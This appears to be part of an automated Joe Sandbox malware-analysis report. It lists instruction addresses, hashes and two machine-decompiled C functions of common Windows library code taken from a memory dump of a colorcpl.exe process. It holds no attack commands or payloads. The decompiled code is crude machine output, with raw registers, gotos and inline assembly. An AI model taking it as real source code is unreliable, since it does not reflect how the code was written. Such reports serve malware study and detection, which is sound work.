                                                                                                0x06e85ad4
                                                                                                0x06e85ad4
                                                                                                0x06e85ade
                                                                                                0x06e85ade
                                                                                                0x06e85aab
                                                                                                0x06e85a79
                                                                                                0x06e85a52
                                                                                                0x06e421f7
                                                                                                0x06e421f9
                                                                                                0x06e421fe
                                                                                                0x06e421fe
                                                                                                0x06e421e3
                                                                                                0x06e42195
                                                                                                0x06e4236c
                                                                                                0x06e42122
                                                                                                0x06e42122
                                                                                                0x06e42124
                                                                                                0x06e42231
                                                                                                0x06e42236
                                                                                                0x06e42236
                                                                                                0x06e42238
                                                                                                0x06e42238
                                                                                                0x06e42240
                                                                                                0x06e42242
                                                                                                0x06e42244
                                                                                                0x06e859fc
                                                                                                0x06e4218c
                                                                                                0x06e4218c
                                                                                                0x00000000
                                                                                                0x06e4218c
                                                                                                0x06e4224a
                                                                                                0x06e4224f
                                                                                                0x06e42256
                                                                                                0x06e42304
                                                                                                0x06e42309
                                                                                                0x06e4230f
                                                                                                0x06e4231e
                                                                                                0x06e4231e
                                                                                                0x06e4231e
                                                                                                0x06e42320
                                                                                                0x06e42325
                                                                                                0x06e4232a
                                                                                                0x06e4232c
                                                                                                0x06e4233e
                                                                                                0x06e4233e
                                                                                                0x00000000
                                                                                                0x06e4232c
                                                                                                0x06e42311
                                                                                                0x06e42317
                                                                                                0x06e4231a
                                                                                                0x06e4231c
                                                                                                0x06e42380
                                                                                                0x06e42380
                                                                                                0x06e42380
                                                                                                0x06e42384
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42386
                                                                                                0x00000000
                                                                                                0x06e4231c
                                                                                                0x06e4225c
                                                                                                0x06e4225c
                                                                                                0x00000000
                                                                                                0x06e4225c
                                                                                                0x06e4212a
                                                                                                0x06e42134
                                                                                                0x06e42138
                                                                                                0x06e4213d
                                                                                                0x06e85858
                                                                                                0x06e85863
                                                                                                0x06e85863
                                                                                                0x06e85867
                                                                                                0x06e8586a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8586c
                                                                                                0x06e8586c
                                                                                                0x06e85871
                                                                                                0x06e85875
                                                                                                0x06e85877
                                                                                                0x06e85997
                                                                                                0x06e8599c
                                                                                                0x06e859a1
                                                                                                0x06e859a7
                                                                                                0x06e859a7
                                                                                                0x00000000
                                                                                                0x06e859a7
                                                                                                0x06e8587d
                                                                                                0x00000000
                                                                                                0x06e8588b
                                                                                                0x06e8588b
                                                                                                0x06e85890
                                                                                                0x06e85892
                                                                                                0x06e85894
                                                                                                0x06e85899
                                                                                                0x06e8589b
                                                                                                0x06e858a0
                                                                                                0x06e858a0
                                                                                                0x06e858aa
                                                                                                0x06e858b2
                                                                                                0x06e858b6
                                                                                                0x06e858be
                                                                                                0x06e858c6
                                                                                                0x06e858c9
                                                                                                0x06e8590d
                                                                                                0x06e85917
                                                                                                0x06e8591a
                                                                                                0x06e8591c
                                                                                                0x06e85920
                                                                                                0x06e85928
                                                                                                0x06e8592a
                                                                                                0x06e8592c
                                                                                                0x06e8592e
                                                                                                0x06e8592e
                                                                                                0x06e858cb
                                                                                                0x06e858cd
                                                                                                0x06e858d8
                                                                                                0x06e858e0
                                                                                                0x06e858f4
                                                                                                0x06e858fe
                                                                                                0x06e858fe
                                                                                                0x06e8593a
                                                                                                0x06e8593e
                                                                                                0x06e85940
                                                                                                0x06e85942
                                                                                                0x00000000
                                                                                                0x06e85944
                                                                                                0x06e85944
                                                                                                0x06e85949
                                                                                                0x06e8594e
                                                                                                0x06e8594e
                                                                                                0x06e85953
                                                                                                0x06e8595b
                                                                                                0x06e85976
                                                                                                0x06e85976
                                                                                                0x06e8597a
                                                                                                0x06e8597f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85981
                                                                                                0x06e85981
                                                                                                0x06e85981
                                                                                                0x06e85983
                                                                                                0x06e85988
                                                                                                0x06e8598d
                                                                                                0x06e85991
                                                                                                0x06e85991
                                                                                                0x00000000
                                                                                                0x06e8595d
                                                                                                0x06e8595d
                                                                                                0x06e85963
                                                                                                0x06e85965
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85967
                                                                                                0x06e85967
                                                                                                0x06e8596b
                                                                                                0x06e8596d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8596f
                                                                                                0x06e85971
                                                                                                0x06e85971
                                                                                                0x06e85974
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85974
                                                                                                0x00000000
                                                                                                0x06e85967
                                                                                                0x06e8595b
                                                                                                0x06e85942
                                                                                                0x06e85863
                                                                                                0x06e42143
                                                                                                0x06e42143
                                                                                                0x06e42149
                                                                                                0x06e4214f
                                                                                                0x06e422f1
                                                                                                0x06e422f6
                                                                                                0x00000000
                                                                                                0x06e42173
                                                                                                0x06e42173
                                                                                                0x06e4217d
                                                                                                0x06e42181
                                                                                                0x06e42186
                                                                                                0x06e859ae
                                                                                                0x06e859b2
                                                                                                0x06e859b5
                                                                                                0x06e859b7
                                                                                                0x06e859ba
                                                                                                0x06e859cd
                                                                                                0x06e859d1
                                                                                                0x06e859d5
                                                                                                0x06e859d9
                                                                                                0x06e859db
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e859dd
                                                                                                0x06e859dd
                                                                                                0x06e859e1
                                                                                                0x06e859e4
                                                                                                0x06e859e7
                                                                                                0x06e859ee
                                                                                                0x06e859ee
                                                                                                0x06e859f3
                                                                                                0x06e859f3
                                                                                                0x00000000
                                                                                                0x06e42186
                                                                                                0x06e4214f
                                                                                                0x06e42106
                                                                                                0x06e42266
                                                                                                0x06e420d8
                                                                                                0x06e420da
                                                                                                0x06e420e0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @A
                                                                                                • API String ID: 0-3377101527
                                                                                                • Opcode ID: ad3308e87d1509687a696a151c1478927a7976afdda43feaa888d547f8aced89
                                                                                                • Instruction ID: 4ed72eea900580ecf1b285244b946c2010986ee4ff7d7b80a1942e87d274d932
                                                                                                • Opcode Fuzzy Hash: ad3308e87d1509687a696a151c1478927a7976afdda43feaa888d547f8aced89
                                                                                                • Instruction Fuzzy Hash: 24F13970A183018FE7E5EF38D84076A77E5AF85318F05A51DFAA98B380DB31D944CB86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E1B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 78%
                                                                                                			E06E1B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x6eef7a8);
				E06E6D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E06E6D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E06E5D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E06E5F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L06E6DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E06E5B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E06E5B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E06E5E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E06E5A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                0x06e1b171
                                                                                                0x06e1b171
                                                                                                0x06e1b171
                                                                                                0x06e1b171
                                                                                                0x06e1b171
                                                                                                0x06e1b176
                                                                                                0x06e1b17b
                                                                                                0x06e1b180
                                                                                                0x06e1b186
                                                                                                0x06e1b18f
                                                                                                0x06e1b198
                                                                                                0x06e1b1a4
                                                                                                0x06e1b1aa
                                                                                                0x06e74802
                                                                                                0x06e74802
                                                                                                0x06e74805
                                                                                                0x06e7480c
                                                                                                0x06e7480e
                                                                                                0x06e1b1d1
                                                                                                0x06e1b1d3
                                                                                                0x06e1b1de
                                                                                                0x06e1b1de
                                                                                                0x06e74817
                                                                                                0x06e7481e
                                                                                                0x06e74820
                                                                                                0x06e74822
                                                                                                0x06e74822
                                                                                                0x06e74824
                                                                                                0x06e74824
                                                                                                0x06e7482a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e74835
                                                                                                0x06e7483a
                                                                                                0x06e7483d
                                                                                                0x06e7483f
                                                                                                0x06e74842
                                                                                                0x06e74842
                                                                                                0x06e74842
                                                                                                0x06e74846
                                                                                                0x06e7484c
                                                                                                0x06e7484e
                                                                                                0x06e74851
                                                                                                0x06e74851
                                                                                                0x06e74853
                                                                                                0x06e74854
                                                                                                0x06e74854
                                                                                                0x06e74858
                                                                                                0x06e7485a
                                                                                                0x06e7485a
                                                                                                0x06e7485d
                                                                                                0x06e7485f
                                                                                                0x06e74861
                                                                                                0x06e74861
                                                                                                0x06e74866
                                                                                                0x06e7486b
                                                                                                0x06e7486e
                                                                                                0x06e74871
                                                                                                0x06e74876
                                                                                                0x06e74876
                                                                                                0x06e74878
                                                                                                0x06e7487b
                                                                                                0x06e74884
                                                                                                0x06e74884
                                                                                                0x00000000
                                                                                                0x06e7487d
                                                                                                0x06e7487d
                                                                                                0x06e74882
                                                                                                0x06e74889
                                                                                                0x06e74889
                                                                                                0x06e7488f
                                                                                                0x06e74891
                                                                                                0x06e748e0
                                                                                                0x06e748e2
                                                                                                0x06e748e4
                                                                                                0x06e748e4
                                                                                                0x06e748e7
                                                                                                0x06e748e7
                                                                                                0x06e748ed
                                                                                                0x06e748f4
                                                                                                0x06e748f6
                                                                                                0x06e74951
                                                                                                0x06e74951
                                                                                                0x06e74953
                                                                                                0x06e74953
                                                                                                0x06e74956
                                                                                                0x06e74956
                                                                                                0x06e74958
                                                                                                0x06e74959
                                                                                                0x06e74959
                                                                                                0x06e7495d
                                                                                                0x06e7495d
                                                                                                0x06e7495f
                                                                                                0x06e7495f
                                                                                                0x06e74965
                                                                                                0x06e74969
                                                                                                0x06e749ba
                                                                                                0x06e749ba
                                                                                                0x06e749c1
                                                                                                0x06e749c5
                                                                                                0x06e749cc
                                                                                                0x06e749d4
                                                                                                0x06e749d7
                                                                                                0x06e749da
                                                                                                0x06e749e4
                                                                                                0x06e749e5
                                                                                                0x06e749f3
                                                                                                0x06e74a02
                                                                                                0x00000000
                                                                                                0x06e74a02
                                                                                                0x06e74972
                                                                                                0x06e74974
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e74976
                                                                                                0x06e74979
                                                                                                0x06e74982
                                                                                                0x06e74983
                                                                                                0x06e74984
                                                                                                0x06e7498b
                                                                                                0x06e7498d
                                                                                                0x06e74991
                                                                                                0x06e74993
                                                                                                0x06e74999
                                                                                                0x06e7499d
                                                                                                0x06e749a2
                                                                                                0x06e749a2
                                                                                                0x06e749a2
                                                                                                0x06e74999
                                                                                                0x06e749ac
                                                                                                0x00000000
                                                                                                0x06e749b3
                                                                                                0x06e748f8
                                                                                                0x06e748fe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e748fe
                                                                                                0x06e74895
                                                                                                0x06e7489c
                                                                                                0x06e748ad
                                                                                                0x06e748b2
                                                                                                0x06e748b5
                                                                                                0x06e748b7
                                                                                                0x06e748ba
                                                                                                0x06e748bc
                                                                                                0x06e748c6
                                                                                                0x06e748c6
                                                                                                0x06e748cb
                                                                                                0x06e748d1
                                                                                                0x06e748d4
                                                                                                0x06e748d8
                                                                                                0x06e748d8
                                                                                                0x00000000
                                                                                                0x06e748d8
                                                                                                0x06e748be
                                                                                                0x06e748c0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e748c2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e748c4
                                                                                                0x00000000
                                                                                                0x06e74882
                                                                                                0x06e7487b
                                                                                                0x06e74904
                                                                                                0x06e74906
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e74908
                                                                                                0x06e7490e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e74910
                                                                                                0x06e74917
                                                                                                0x06e74917
                                                                                                0x00000000
                                                                                                0x06e74917
                                                                                                0x06e1b1ba
                                                                                                0x06e747f9
                                                                                                0x06e747fc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e747fc
                                                                                                0x06e1b1c0
                                                                                                0x06e1b1c0
                                                                                                0x06e1b1c3
                                                                                                0x06e1b1cb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: _vswprintf_s
                                                                                                • String ID:
                                                                                                • API String ID: 677850445-0
                                                                                                • Opcode ID: 4e76fb299d02c0fc82d6a9d4423b3538bf225664c5308bd91123af23ef91eb3f
                                                                                                • Instruction ID: 272ce5d6f7e0daa5504a8ce56758466044c1697d1a647783b9575d18db352304
                                                                                                • Opcode Fuzzy Hash: 4e76fb299d02c0fc82d6a9d4423b3538bf225664c5308bd91123af23ef91eb3f
                                                                                                • Instruction Fuzzy Hash: 1551FF71E1036ACFEBB1CF64C944BAEBBF0AF04314F1151A9E869AB2C1D7704945DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E06E3B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x6f0d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E06E37D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E06EE8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E06E59E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E06E5B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E06E5CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E06E37D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E06EE8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E06E5AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x6f08628; // 0x0
								_v68 = _t77;
								_t78 =  *0x6f0862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x6f08628; // 0x0
							_t116 =  *0x6f0862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                0x06e3b94c
                                                                                                0x06e3b956
                                                                                                0x06e3b95c
                                                                                                0x06e3b95e
                                                                                                0x06e3b964
                                                                                                0x06e3b969
                                                                                                0x06e3b96d
                                                                                                0x06e3b96d
                                                                                                0x06e3b970
                                                                                                0x06e3b974
                                                                                                0x06e3b97a
                                                                                                0x06e3badf
                                                                                                0x06e3badf
                                                                                                0x06e3bae2
                                                                                                0x06e3bae4
                                                                                                0x06e3bae6
                                                                                                0x06e3baf0
                                                                                                0x06e82cb8
                                                                                                0x06e3baf6
                                                                                                0x06e3baf6
                                                                                                0x06e3baf6
                                                                                                0x06e3bafd
                                                                                                0x06e3bb1f
                                                                                                0x06e3bb1f
                                                                                                0x06e3baff
                                                                                                0x06e3bb00
                                                                                                0x06e3bb00
                                                                                                0x06e3bb03
                                                                                                0x06e3bb03
                                                                                                0x06e3bacb
                                                                                                0x06e3bacf
                                                                                                0x06e3bad0
                                                                                                0x06e3bad1
                                                                                                0x06e3badc
                                                                                                0x06e3badc
                                                                                                0x06e3b980
                                                                                                0x06e3b980
                                                                                                0x06e3b988
                                                                                                0x06e3b98b
                                                                                                0x06e3b98d
                                                                                                0x06e3b990
                                                                                                0x06e3b993
                                                                                                0x06e3b999
                                                                                                0x06e3b99b
                                                                                                0x06e3b9a1
                                                                                                0x06e3b9a5
                                                                                                0x06e3b9aa
                                                                                                0x06e3b9b0
                                                                                                0x06e3b9bb
                                                                                                0x06e3b9c0
                                                                                                0x06e3b9c3
                                                                                                0x06e3b9ca
                                                                                                0x06e3b9cc
                                                                                                0x06e3b9cf
                                                                                                0x06e3b9d3
                                                                                                0x06e3b9d7
                                                                                                0x06e3ba94
                                                                                                0x06e3ba94
                                                                                                0x06e3ba98
                                                                                                0x06e3baa3
                                                                                                0x06e82ccb
                                                                                                0x06e3baa9
                                                                                                0x06e3baa9
                                                                                                0x06e3baa9
                                                                                                0x06e3bab1
                                                                                                0x06e82cd5
                                                                                                0x06e82cdd
                                                                                                0x06e82cdd
                                                                                                0x06e3babb
                                                                                                0x06e3babc
                                                                                                0x06e3bac2
                                                                                                0x06e3bac3
                                                                                                0x06e3bac3
                                                                                                0x06e3bac6
                                                                                                0x00000000
                                                                                                0x06e3b9dd
                                                                                                0x06e3b9dd
                                                                                                0x06e3b9e7
                                                                                                0x06e3b9e7
                                                                                                0x06e3b9ec
                                                                                                0x06e3b9ec
                                                                                                0x06e3b9f1
                                                                                                0x06e3b9f5
                                                                                                0x06e3b9fa
                                                                                                0x06e3ba00
                                                                                                0x06e3ba0c
                                                                                                0x06e3ba10
                                                                                                0x06e3ba10
                                                                                                0x06e3ba12
                                                                                                0x06e3ba18
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3bb26
                                                                                                0x06e3bb26
                                                                                                0x06e3ba1e
                                                                                                0x06e3ba1e
                                                                                                0x06e3ba23
                                                                                                0x06e3ba25
                                                                                                0x06e3ba2c
                                                                                                0x06e3ba30
                                                                                                0x06e3ba35
                                                                                                0x06e3ba35
                                                                                                0x06e3ba41
                                                                                                0x06e3ba46
                                                                                                0x06e3ba4c
                                                                                                0x06e3ba50
                                                                                                0x06e3ba54
                                                                                                0x06e3ba6a
                                                                                                0x06e3ba6e
                                                                                                0x06e3ba70
                                                                                                0x06e3ba74
                                                                                                0x06e3ba78
                                                                                                0x06e3ba7a
                                                                                                0x06e3ba7c
                                                                                                0x06e3ba8e
                                                                                                0x06e3ba90
                                                                                                0x06e3ba92
                                                                                                0x06e3bb14
                                                                                                0x06e3bb14
                                                                                                0x06e3bb16
                                                                                                0x06e3bb16
                                                                                                0x00000000
                                                                                                0x06e3ba7c
                                                                                                0x06e3bb0a
                                                                                                0x06e3bb0d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3bb0f

                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 06E3B9A5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 885266447-0
